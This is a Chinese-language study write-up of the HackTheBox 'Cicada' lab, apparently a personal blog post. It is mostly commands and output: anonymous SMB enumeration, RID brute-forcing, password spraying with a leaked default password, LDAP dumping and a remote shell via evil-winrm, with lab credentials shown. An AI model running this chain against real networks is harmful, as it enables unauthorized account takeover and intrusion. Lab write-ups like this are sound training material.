nmap
└─# nmap 10.10.11.35
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-28 08:07 EDT
Nmap scan report for 10.10.11.35
Host is up (0.43s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3269/tcp open globalcatLDAPssl
发现有139和445,可能是windows,而且有ldap看起来是有域环境在的。
使用
nmap -A -O 10.10.11.35
重新扫一下可以确认,就是htb有时候网络拥堵,会比较慢
smb匿名登录一下:
smbclient -L ////$ip -U ""
# smbclient -L -N ////$ip
Password for [WORKGROUP\]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.35 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
GPT:
在匿名登录 SMB 服务时,通常可以访问一些默认的共享目录,这些目录可能包括:
- IPC$: 这是一个用于进程间通信的共享,通常对所有用户开放。
- ADMIN$: 管理共享,通常只对管理员可见,但某些配置可能允许匿名访问。
- C$: 系统根目录的共享,通常也只对管理员可见,但可能在某些配置下对匿名用户开放。
- NETLOGON: 存储登录脚本和策略的共享,通常只对域控制器可用。
- SYSVOL: 存储域控制器的公共文件夹,通常用于存放组策略和登录脚本。
这个DEV和HR应该是后面创建的,可以看看,发现还是上面的回显,有些忘了怎么测试smb了,看看wp:
Checking SMB first using
enum4linuxenum4linux $ip
运行后看到一个:
[+] Server 10.10.11.35 allows sessions using username '', password ''
Using
impackettools and in specificcrackmapexecto identify available sharespoetry run crackmapexec smb $ip -u "" -p "" --shares
这里poetry属于是pip+venv,我kali报错先不使用这个虚拟环境。
└─# crackmapexec smb 10.10.11.35 -u "" -p "" --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\:
SMB 10.10.11.35 445 CICADA-DC [-] Error enumerating shares: STATUS_ACCESS_DENIED
这个DC应该是域控,把地址加到hosts先
echo "10.10.11.35 cicada.htb CICADA-DC.cicada.htb" >> /etc/hosts
查看HR(前面是命令错了):
smbclient //10.10.11.35/HR
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 08:29:09 2024
.. D 0 Thu Mar 14 08:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 13:31:48 2024
为什么变成两个/有点忘了,之前的博客好像写过,先记着吧。
使用megt下载这个文件
cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
看到了邮件里的默认密码:Cicada$M6Corpb*@Lp#nZp!8
爆破一下用户名:
crackmapexec smb $ip -u "guest" -p "" --rid-brute
crackmapexec smb 10.10.11.35 -u "guest" -p "" --rid-brute > username.txt
密码喷洒:(先处理username.txt)
grep -oP '(?<=CICADA\\)[^ ]+' filename
crackmapexec smb $ip -u username.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
gtp:
为了确保能匹配到
emily.oscars,不受后续字符(如括号)影响,你可以使用更灵活的正则表达式。例如,可以使用.*?来匹配任意字符,直到遇到括号:bash 复制代码 grep -oP '(?<=CICADA\\)[^ ]+' filename这里的正则表达式解释如下:
(?<=CICADA\\): 匹配前面是CICADA\的位置。[^ ]+: 匹配一个或多个非空格字符,这样就可以一直匹配到emily.oscars,直到遇到空格为止。这样就可以成功提取到
emily.oscars,无论后面是否有括号或其他内容。
然后可以得到一个账户:
michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
测试一下这个账户的权限:
crackmapexec smb $ip -u "michael.wrightson" -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
crackmapexec smb 10.10.11.35 -u "michael.wrightson" -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
显示timeout,htb的网真的想杀人:
└─# crackmapexec smb 10.10.11.35 -u "michael.wrightson" -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC [-] Error enumerating shares: The NETBIOS connection with the remote host timed out.
直接连上去吧:
smbclient //$ip -U 'michael.wrightson'
但是!
└─# smbclient //10.10.11.35 -U ‘michael.wrightson’ Password for [WORKGROUP\michael.wrightson]: \10.10.11.35: Not enough ‘' characters in service
GPT:
这个错误通常是由于指定的 SMB 服务路径不正确导致的。在使用
smbclient时,路径格式应该是//<主机名>/<共享名>。在你的命令中,应该添加共享名。尝试以下命令:
bash 复制代码 smbclient //10.10.11.35/<共享名> -U 'michael.wrightson'
但话又说回来~
GPT:
请将
<共享名>替换为实际的共享目录名(如IPC$或其他共享名称)。如果不确定共享名,可以使用以下命令列出可用共享:bash 复制代码 smbclient -L //10.10.11.35 -U 'michael.wrightson'
没有GPT包一天都学不下去的(T^T)
└─# smbclient -L //10.10.11.35 -U 'michael.wrightson'
Password for [WORKGROUP\michael.wrightson]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.35 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
有新文件了,瞅一瞅:
mbclient //10.10.11.35/SYSVOL -U 'michael.wrightson'
Password for [WORKGROUP\michael.wrightson]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Aug 22 13:40:07 2024
.. D 0 Thu Mar 14 07:08:56 2024
cicada.htb Dr 0 Thu Mar 14 07:08:56 2024
4168447 blocks of size 4096. 414427 blocks available
smb: \> mget cicada.htb/*
上去了,找不到有用的东西,没什么经验先学习wp怎么做吧:
使用名为ldapdomaindump的LDAP工具,转储了可以使用实际当前用户权限查询的所有内容
ldapdomaindump 10.10.11.35 -u 'cicada.htb\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'
下载了很多domain开头的文件,像是一些日志啥的,先梭哈一下:
grep password domain*
domain_users.html:<tr><td>David Orelious</td><td>David Orelious</td><td>david.orelious</td><td> </td><td><a href="domain_users_by_group.html#cn_Domain_Users" title="CN=Domain Users,OU=Group,DC=cicada,DC=htb">Domain Users</a></td><td>03/14/24 12:17:29</td><td>10/29/24 10:30:00</td><td>10/29/24 13:02:29</td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD</td><td>03/14/24 12:17:29</td><td><abbr title="S-1-5-21-917908876-1423158569-3159038727-1108">1108</abbr></td><td>Just in case I forget my password is aRt$Lp#7t*VQ!3</td></tr>
舒服了,david.orelious:aRt$Lp#7t*VQ!3
└─# crackmapexec smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.10.11.35 445 NONE [*] x64 (name:) (domain:) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 NONE [-] Connection Error: The NETBIOS connection with the remote host timed out.
习惯就行,手工测试,在DEV找到新凭证emily.oscars:Q!3@Lp#M6b*7t*Vt
这个账户可以访问文件系统,于是:
evil-winrm -i $ip -u "emily.oscars" -p 'Q!3@Lp#M6b*7t*Vt'
可以得到一个shell
evil-winrm -i 10.10.11.35 -u "emily.oscars" -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>
后续需要下载内网脚本,有点累了内网先就到这里先准备ctf考核,等后续需要研究内网和域渗透的时候再研究这个靶机。